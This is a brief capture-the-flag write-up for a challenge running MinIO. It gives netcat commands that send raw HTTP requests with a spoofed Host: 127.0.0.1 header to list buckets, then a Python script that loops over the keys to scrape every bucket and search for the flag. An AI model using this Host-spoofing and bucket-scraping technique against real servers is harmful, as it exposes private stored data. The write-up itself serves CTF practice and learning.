Server: MinIO
Get list of buckets
echo “GET /bucket HTTP/1.1\r\nHost:127.0.0.1\r\n” | nc challenge.ctf.games 31877 -w 1
Save to file
echo “GET /bucket HTTP/1.1\r\nHost:127.0.0.1\r\n” | nc challenge.ctf.games 31877 -w 1 > buckets.txt
Parse out keys, make comma separated, create script to scrape all buckets and output to txt
Scrape.py
import subprocess
variables = [“comma”,”seperated”,”keys”]
# Open a file to write the output
with open(“output.txt”, “w”) as file:
# Iterate over each variable and send the request
for variable in variables:
command = f’echo “GET /bucket/{variable} HTTP/1.1\\r\\nHost:127.0.0.1\\r\\n” | nc challenge.ctf.games 30580 -w 1′
# Use subprocess to run the command
process = subprocess.run(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
# Write the output to the file
file.write(f”Request for /bucket/{variable}:\n”)
file.write(process.stdout.decode()) # Write the response from nc
if process.stderr:
file.write(“Error: ” + process.stderr.decode() + “\n”)
# Optional: Write a separator between different requests
file.write(“\n” + “=”*40 + “\n\n”)
Grep txt for flag
Killian Sherer 